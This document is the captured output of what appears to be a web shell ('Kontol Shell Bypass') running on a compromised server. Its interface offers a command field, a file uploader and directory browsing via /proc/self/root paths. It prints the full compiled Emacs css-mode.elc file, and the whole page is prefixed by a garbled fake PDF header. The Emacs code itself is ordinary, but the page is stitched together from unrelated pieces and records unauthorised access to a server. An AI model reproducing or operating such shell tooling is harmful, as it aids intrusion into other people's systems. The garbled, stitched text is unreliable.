%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/proc/self/root/usr/share/emacs/25.2/lisp/textmodes/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/proc/self/root/usr/share/emacs/25.2/lisp/textmodes/css-mode.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2.1
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


(custom-declare-group 'css nil "Cascading Style Sheets (CSS) editing mode." :group 'languages)
#@33 Identifiers for pseudo-classes.
(defconst css-pseudo-class-ids '("active" "checked" "disabled" "empty" "enabled" "first" "first-child" "first-of-type" "focus" "hover" "indeterminate" "lang" "last-child" "last-of-type" "left" "link" "not" "nth-child" "nth-last-child" "nth-last-of-type" "nth-of-type" "only-child" "only-of-type" "right" "root" "target" "visited") (#$ . 505))
#@34 Identifiers for pseudo-elements.
(defconst css-pseudo-element-ids '("after" "before" "first-letter" "first-line") (#$ . 886))
#@43 Identifiers that appear in the form @foo.
(defconst css-at-ids '("charset" "font-face" "import" "media" "namespace" "page") (#$ . 1018))
#@43 Identifiers that appear in the form !foo.
(defconst css-bang-ids '("important") (#$ . 1161))
#@62 Additional identifiers that appear in the form !foo in SCSS.
(defconst scss-bang-ids '("default" "global" "optional") (#$ . 1260))
#@35 Identifiers for font descriptors.
(defconst css-descriptor-ids '("ascent" "baseline" "bbox" "cap-height" "centerline" "definition-src" "descent" "font-family" "font-size" "font-stretch" "font-style" "font-variant" "font-weight" "mathline" "panose-1" "slope" "src" "stemh" "stemv" "topline" "unicode-range" "units-per-em" "widths" "x-height") (#$ . 1397))
#@33 Identifiers for types of media.
(defconst css-media-ids '("all" "aural" "bitmap" "continuous" "grid" "paged" "static" "tactile" "visual") (#$ . 1758))
#@29 Identifiers for properties.
(defconst css-property-ids '("azimuth" "border-collapse" "border-spacing" "bottom" "caption-side" "clear" "clip" "content" "counter-increment" "counter-reset" "cue" "cue-after" "cue-before" "direction" "display" "elevation" "empty-cells" "float" "height" "left" "line-height" "list-style" "list-style-image" "list-style-position" "list-style-type" "margin" "margin-bottom" "margin-left" "margin-right" "margin-top" "max-height" "max-width" "min-height" "min-width" "orphans" "padding" "padding-bottom" "padding-left" "padding-right" "padding-top" "page-break-after" "page-break-before" "page-break-inside" "pause" "pause-after" "pause-before" "pitch" "pitch-range" "play-during" "position" "quotes" "richness" "right" "speak" "speak-header" "speak-numeral" "speak-punctuation" "speech-rate" "stress" "table-layout" "top" "unicode-bidi" "vertical-align" "visibility" "voice-family" "volume" "widows" "width" "z-index" "animation" "animation-delay" "animation-direction" "animation-duration" "animation-fill-mode" "animation-iteration-count" "animation-name" "animation-play-state" "animation-timing-function" "background" "background-attachment" "background-clip" "background-color" "background-image" "background-origin" "background-position" "background-repeat" "background-size" "border" "border-bottom" "border-bottom-color" "border-bottom-left-radius" "border-bottom-right-radius" "border-bottom-style" "border-bottom-width" "border-color" "border-image" "border-image-outset" "border-image-repeat" "border-image-slice" "border-image-source" "border-image-width" "border-left" "border-left-color" "border-left-style" "border-left-width" "border-radius" "border-right" "border-right-color" "border-right-style" "border-right-width" "border-style" "border-top" "border-top-color" "border-top-left-radius" "border-top-right-radius" "border-top-style" "border-top-width" "border-width" "box-shadow" "box-sizing" "caret-color" "cursor" "nav-down" "nav-left" "nav-right" "nav-up" "outline" "outline-color" "outline-offset" "outline-style" "outline-width" "resize" "text-overflow" "color" "opacity" "align-content" "align-items" "align-self" "flex" "flex-basis" "flex-direction" "flex-flow" "flex-grow" "flex-shrink" "flex-wrap" "justify-content" "order" "font" "font-family" "font-feature-settings" "font-kerning" "font-language-override" "font-size" "font-size-adjust" "font-stretch" "font-style" "font-synthesis" "font-variant" "font-variant-alternates" "font-variant-caps" "font-variant-east-asian" "font-variant-ligatures" "font-variant-numeric" "font-variant-position" "font-weight" "max-lines" "overflow" "overflow-x" "overflow-y" "text-decoration" "text-decoration-color" "text-decoration-line" "text-decoration-skip" "text-decoration-style" "text-emphasis" "text-emphasis-color" "text-emphasis-position" "text-emphasis-style" "text-shadow" "text-underline-position" "hanging-punctuation" "hyphens" "letter-spacing" "line-break" "overflow-wrap" "tab-size" "text-align" "text-align-last" "text-indent" "text-justify" "text-transform" "white-space" "word-break" "word-spacing" "word-wrap" "backface-visibility" "perspective" "perspective-origin" "transform" "transform-origin" "transform-style" "transition" "transition-delay" "transition-duration" "transition-property" "transition-timing-function" "color-interpolation-filters" "filter" "flood-color" "flood-opacity" "lighting-color") (#$ . 1915))
(byte-code "\300\301\302\303\304DD\305\306\307\310\311\312\313\314\315&\207" [custom-declare-variable css-electric-keys funcall function #[0 "\300\207" [(125 59)] 1] "Self inserting keys which should trigger re-indentation." :version "22.2" :type (repeat character) :options ((125 59)) :group css] 12)
(defvar css-mode-syntax-table (byte-code "\300 \301\302\303#\210\301\304\305#\210\301\306\307#\210\301\310\307#\210\301\311\312#\210\301\313\314#\210\301\315\316#\210\301\317\320#\210\301\321\322#\210\301\323\324#\210\301\325\326#\210\301\327\326#\210\301\330\331#\210\211\207" [make-syntax-table modify-syntax-entry 47 ". 14" 42 ". 23b" 34 "\"" 39 123 "(}" 125 "){" 40 "()" 41 ")(" 91 "(]" 93 ")[" 64 "'" 35 45 "_"] 5))
(defconst css--uri-re "url\\((\\)[[:space:]]*\\(?:\\\\.\\|[^()[:space:]\n'\"]\\)+[[:space:]]*\\()\\)")
(defconst css-syntax-propertize-function #[514 "b\210`W\205:\300\301\302#\205:\303\224\204\304\224\203\303\224\203)\305\303\224\303\225\306\307$\210\304\224\203\305\304\224\304\225\306\307$\210\202\207" [re-search-forward "url\\((\\)[[:space:]]*\\(?:\\\\.\\|[^()[:space:]\n'\"]\\)+[[:space:]]*\\()\\)" t 1 2 put-text-property syntax-table (15)] 7 "\n\n(fn START END)"])
(defconst css-escapes-re "\\\\\\(?:[^-]\\|[0-9a-fA-F]+[ \n	
\f]?\\)")
(defconst css-nmchar-re (concat "\\(?:[-[:alnum:]]\\|" css-escapes-re "\\)"))
(defconst css-nmstart-re (concat "\\(?:[[:alpha:]]\\|" css-escapes-re "\\)"))
(defconst css-ident-re (concat css-nmchar-re "+"))
(defconst css-proprietary-nmstart-re "[-_]\\(?:khtml\\|m\\(?:oz\\|s\\)\\|o\\|webkit\\)-")
(defconst css-name-re (concat css-nmchar-re "+"))
(defconst scss--hash-re "#\\(?:{[$-_[:alnum:]]+}\\|[[:alnum:]]+\\)")
(byte-code "\300\301\302\303\304\305%\210\300\306\307\310\304\305%\210\300\311\312\313#\207" [custom-declare-face css-selector ((t :inherit font-lock-function-name-face)) "Face to use for selectors." :group css css-property ((t :inherit font-lock-variable-name-face)) "Face to use for properties." css-proprietary-property ((t :inherit (css-property italic))) "Face to use for vendor-specific properties."] 6)
(defalias 'css--font-lock-keywords #[256 "\306\307\310\205	\"!P\311B\312\nP\313B\314\nP\315B\316\204!\317\202)\320\321\322\323\260\324\307\310\f
\"\325\"\326\307
\325\"\327\330\204A\331\202E\332\333Q\334\335\260\336B\337\340\341'\342(\327)\343\344\260	\345B*\346B\257\207" [scss-bang-ids css-bang-ids css-ident-re scss--hash-re css-pseudo-class-ids css-pseudo-element-ids "!\\s-*" regexp-opt append ((0 font-lock-builtin-face)) "@" ((0 font-lock-builtin-face)) "--" ((0 font-lock-variable-name-face)) "^[ 	]*\\(" "[^@/:{}() 	\n][^:{}()]+" "\\(?:" "\\|[^@/:{}() 	\n#]\\)" "[^:{}()#]*\\(?:" "[^:{}()#]*\\)*" "\\(?:\\(:" t "\\|\\::" "\\)" "\\(?:([^)]+)\\)?" "[^:{}()\n]*" "[^:{}()\n#]*\\(?:" "[^:{}()\n#]*\\)*" "\\)*" "\\)\\(?:\n[ 	]*\\)*{" ((1 'css-selector keep)) ("^[ 	]*{" (0 (save-excursion (goto-char (match-beginning 0)) (skip-chars-backward " \n	") (put-text-property (point) (match-end 0) 'font-lock-multiline t) nil))) "\\(?:[{;]\\|^\\)[ 	]*\\(" "\\(?:\\(" "\\)\\|" "*" "\\)\\s-*:" ((1 (if (match-end 2) 'css-proprietary-property 'css-property))) ((1 'default t) (2 'default t)) css-proprietary-nmstart-re css-nmstart-re css-nmchar-re css--uri-re] 15 "\n\n(fn &optional SASSY)"])
(defvar css-font-lock-keywords (css--font-lock-keywords))
(defvar css-font-lock-defaults '(css-font-lock-keywords nil t))
(byte-code "\300\301\302\303\304DD\305\306\307\310\311\312\313&	\210\314\315!\207" [custom-declare-variable css-indent-offset funcall function #[0 "\300\207" [4] 1] "Basic size of one indentation step." :version "22.2" :type integer :safe integerp require smie] 10)
(defconst css-smie-grammar '((":" 22 33) ("," 11 11) (";" 0 0)))
(defalias 'css-smie--forward-token #[0 "`Sf\301=\203-\302 \203-\303f\304>\204\305!\203-\303f\306>\203'\307u\210\202+\310\307!\210\311\207\310d!\210\305\312!\203>\307u\210\313\314!\207\315 \207" [comment-start-skip 125 scss-smie--not-interpolation-p nil (32 9 10) looking-at (32 9 10) 1 forward-comment ";" "[;,:]" match-string 0 smie-default-forward-token] 2])
(defalias 'css-smie--backward-token #[0 "`\300`[!\210`Sf\301=\203\302 \203\211`V\203\303\2021`Sf\304>\203/\305u\210\306\307f!\2021\310 \207" [forward-comment 125 scss-smie--not-interpolation-p ";" (59 44 58) -1 string nil smie-default-backward-token] 3])
(defalias 'css-smie-rules #[514 "B\211:\205{\211@\211\301=\203,A\211\302=\203\202'\211\303=\203&\304\202'\305\262\202y\211\306=\203@A\211\307\235\205;\310\262\202y\211\311=\203xA\211\312\232\203a\313 \204X\314 \205s\315\316!\210\317 \202s\211\320\232\203r\313 \205s\321\304!\202s\305\262\202y\305\262\207" [css-indent-offset :elem basic arg 0 nil :list-intro ("" ";") t :before "{" smie-rule-hanging-p smie-rule-bolp smie-backward-sexp ";" smie-indent-virtual "(" smie-rule-parent] 7 "\n\n(fn KIND TOKEN)"])
#@29 Complete property at point.
(defalias 'css--complete-property #[0 "\212`\301\302x\210`\303\302x\210`Sf\304>\205\211E\262\262)\207" [css-property-ids "-[:alnum:]" nil " 	
\n" (123 59)] 5 (#$ . 10308)])
#@51 Complete pseudo-element or pseudo-class at point.
(defalias 'css--complete-pseudo-element-or-class #[0 "\212`\302\303x\210`Sf\304=\205#``S\206`Sf\304=\203!\202\"	E\262)\207" [css-pseudo-element-ids css-pseudo-class-ids "-[:alnum:]" nil 58] 5 (#$ . 10521)])
#@59 Complete at-rule (statement beginning with `@') at point.
(defalias 'css--complete-at-rule #[0 "\212`\301\302x\210`Sf\303=\205`E\262)\207" [css-at-ids "-[:alnum:]" nil 64] 4 (#$ . 10792)])
#@131 Complete current symbol at point.
Currently supports completion of CSS properties, pseudo-elements,
pseudo-classes, and at-rules.
(defalias 'css-completion-at-point #[0 "\300 \206\f\301 \206\f\302 \207" [css--complete-property css--complete-pseudo-element-or-class css--complete-at-rule] 1 (#$ . 10993)])
#@160 Hook run after entering CSS mode.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar css-mode-hook nil (#$ . 11307))
(byte-code "\300\301!\204\f\302\301\303\304#\210\300\207" [boundp css-mode-map put definition-name css-mode] 4)
(defvar css-mode-map (make-sparse-keymap))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\305\306!\204\302\306\307\310#\210\300\207" [css-mode-map variable-documentation put purecopy "Keymap for `css-mode'." boundp css-mode-syntax-table definition-name css-mode] 5)
(defvar css-mode-syntax-table (make-syntax-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [css-mode-syntax-table variable-documentation put purecopy "Syntax table for `css-mode'." css-mode-abbrev-table definition-name css-mode] 5)
(defvar css-mode-abbrev-table (progn (define-abbrev-table 'css-mode-abbrev-table nil) css-mode-abbrev-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [css-mode-abbrev-table variable-documentation put purecopy "Abbrev table for `css-mode'." css-mode derived-mode-parent prog-mode] 5)
#@213 Major mode to edit Cascading Style Sheets.

In addition to any hooks its parent mode `prog-mode' might have run,
this mode runs the hook `css-mode-hook', as the final step
during initialization.

\{css-mode-map}
(defalias 'css-mode #[0 "\306\300!\210\307\310 \210\311\312\310\313N\203\314\311\313\310\313N#\210\315!\204'\316\317 \"\210\320\f!\211\2035\211\321 =\203;\322\f\323 \"\210\210\324
\325\"\204R
8=\204R\326
\3258C#\210\327!\210\330\f!\210
8\306\331!\2109\306\332!\210\333\306\334!\210\335\306\336!\210\337\306\340!\210\341 \306\342!\210:\"\306\343!\210\344#\306\345!\210\346%\306\347!\210\350'\351;\352\353\354\355\356&\210\306\357!\210\360</\"/\361\362\363\364\365$\210)\366\367!\207" [delay-mode-hooks major-mode mode-name css-mode-map css-mode-syntax-table css-mode-abbrev-table make-local-variable t prog-mode css-mode "CSS" mode-class put keymap-parent set-keymap-parent current-local-map char-table-parent standard-syntax-table set-char-table-parent syntax-table abbrev-table-get :parents abbrev-table-put use-local-map set-syntax-table font-lock-defaults comment-start "/*" comment-start-skip "/\\*+[ 	]*" comment-end "*/" comment-end-skip "[ 	]*\\*+/" syntax-propertize-function fill-paragraph-function css-fill-paragraph adaptive-fill-function css-adaptive-fill add-log-current-defun-function css-current-defun-name smie-setup css-smie-rules :forward-token css-smie--forward-token :backward-token css-smie--backward-token electric-indent-chars append add-hook completion-at-point-functions css-completion-at-point nil local run-mode-hooks css-mode-hook local-abbrev-table css-font-lock-defaults css-syntax-propertize-function css-smie-grammar css-electric-keys] 7 (#$ . 12488) nil])
(defalias 'css-fill-paragraph #[256 "\212\212\306 \210\307\310 \311\")\203\312\225b\210\313 \314 \3158\203{\212\3168b\210\317\320!\210n?`\262)\203{\214\3168}\210\321 \210\322\203V\323\324\"\203V\325\326!\327	\327\n\330\331\332\260\n\202W\203n\323\324\"\203n\333\326!\334\f\332\260\202o\f\335!\210,\311\202;\3168?\205;A@\204\244\3361\237\337\320!\210`X\205\233\313 \211\2620\202\241\210\322\205;A@b\210\212\3401\272\341\320!\210\342`\311\"0\202\274\210\322)\211\2059\343\344\311#\203,\316\313 8\204\301`S\206\326`Sf\345=\204\301`Sf\346=\203\375\212\347u\210\350\322x\210n\204\371\351 \203\371\352 \210)\202\301\314 \262\317\320!\203 `V\203 \212\317\347!\210`W\205\352 \210\311)\204\375`W\203\301\352 \210\202\301A@b\210\353\354\355!\"\210\311\262\266\202)\207" [comment-continue comment-start-skip comment-end-skip paragraph-separate paragraph-start fill-paragraph-function beginning-of-line comment-search-forward point-at-eol t 0 syntax-ppss line-end-position 4 8 forward-comment 1 comment-normalize-vars nil string-match "[^ 	]" "\\(?:[ 	]*\\(?:" regexp-quote "\\|" "\\)\\)?" "\\(?:" "\\)" "\\(?:[ 	]*" "\\)?\\(?:" fill-paragraph (error) down-list (error) forward-sexp copy-marker re-search-forward "[{;}]" 35 125 -1 " 	" scss-smie--not-interpolation-p newline indent-region line-beginning-position 2] 14 "\n\n(fn &optional JUSTIFY)"])
(defalias 'css-adaptive-fill #[0 "\300\301!\205\302\303!\304\305\"\205\306\307\310\211$\262\207" [looking-at "[ 	]*/\\*[ 	]*" match-string 0 string-match "/\\*" replace-match " *" t] 6])
#@54 Return the name of the CSS section at point, or nil.
(defalias 'css-current-defun-name #[0 "\212e`\300Z]\301\302\303#\205\304\305x\210\306 \210\307\310!\205\311\312!\262)\207" [1600 search-backward "{" t " 	
\n" nil beginning-of-line looking-at "^[ 	]*\\([^{
\n]*[^ {	
\n]\\)" match-string-no-properties 1] 5 (#$ . 15829)])
(defvar scss-mode-syntax-table (byte-code "\301!\302\303\304#\210\302\305\306#\210\211\207" [css-mode-syntax-table make-syntax-table modify-syntax-entry 47 ". 124" 10 ">"] 5))
(defvar scss-font-lock-keywords (byte-code "\301\302P\303BC\304\305!\306\307Q\310BC#\207" [css-ident-re append "$" ((0 font-lock-variable-name-face)) css--font-lock-keywords sassy "@mixin[ 	]+\\(" "\\)[ 	]*(" ((1 font-lock-function-name-face))] 6))
(defalias 'scss-smie--not-interpolation-p #[0 "\212\300u\210\301\302x\303U\206\304\305`\306Z\"?)\207" [-1 "-[:alnum:]" nil 0 looking-back "#{\\$" 3] 4])
#@161 Hook run after entering SCSS mode.
No problems result if this variable is not bound.
`add-hook' automatically binds it.  (This is true for all hook variables.)
(defvar scss-mode-hook nil (#$ . 16751))
(byte-code "\300\301!\204\f\302\301\303\304#\210\300\207" [boundp scss-mode-map put definition-name scss-mode] 4)
(defvar scss-mode-map (make-sparse-keymap))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\305\306!\204\302\306\307\310#\210\300\207" [scss-mode-map variable-documentation put purecopy "Keymap for `scss-mode'." boundp scss-mode-syntax-table definition-name scss-mode] 5)
(defvar scss-mode-syntax-table (make-syntax-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [scss-mode-syntax-table variable-documentation put purecopy "Syntax table for `scss-mode'." scss-mode-abbrev-table definition-name scss-mode] 5)
(defvar scss-mode-abbrev-table (progn (define-abbrev-table 'scss-mode-abbrev-table nil) scss-mode-abbrev-table))
(byte-code "\300\301N\204\302\300\301\303\304!#\210\302\305\306\307#\207" [scss-mode-abbrev-table variable-documentation put purecopy "Abbrev table for `scss-mode'." scss-mode derived-mode-parent css-mode] 5)
#@209 Major mode to edit "Sassy CSS" files.

In addition to any hooks its parent mode `css-mode' might have run,
this mode runs the hook `scss-mode-hook', as the final step
during initialization.

\{scss-mode-map}
(defalias 'scss-mode #[0 "\306\300!\210\307\310 \210\311\312\310\313N\203\314\311\313\310\313N#\210\315!\204'\316\317 \"\210\320\f!\211\2035\211\321 =\203;\322\f\323 \"\210\210\324
\325\"\204R
'=\204R\326
\325'C#\210\327!\210\330\f!\210
'\306\331!\210\332\306\333!\210\334\306\335!\210\336\306\337!\210\340\306\341!\210\342!\306\343!\210\344#)\345\346!\207" [delay-mode-hooks major-mode mode-name scss-mode-map scss-mode-syntax-table scss-mode-abbrev-table make-local-variable t css-mode scss-mode "SCSS" mode-class put keymap-parent set-keymap-parent current-local-map char-table-parent standard-syntax-table set-char-table-parent syntax-table abbrev-table-get :parents abbrev-table-put use-local-map set-syntax-table comment-start "// " comment-end "" comment-continue " *" comment-start-skip "/[*/]+[ 	]*" comment-end-skip "[ 	]*\\(?:\n\\|\\*+/\\)" font-lock-defaults (scss-font-lock-keywords nil t) run-mode-hooks scss-mode-hook local-abbrev-table] 5 (#$ . 17951) nil])
(provide 'css-mode)

Kontol Shell Bypass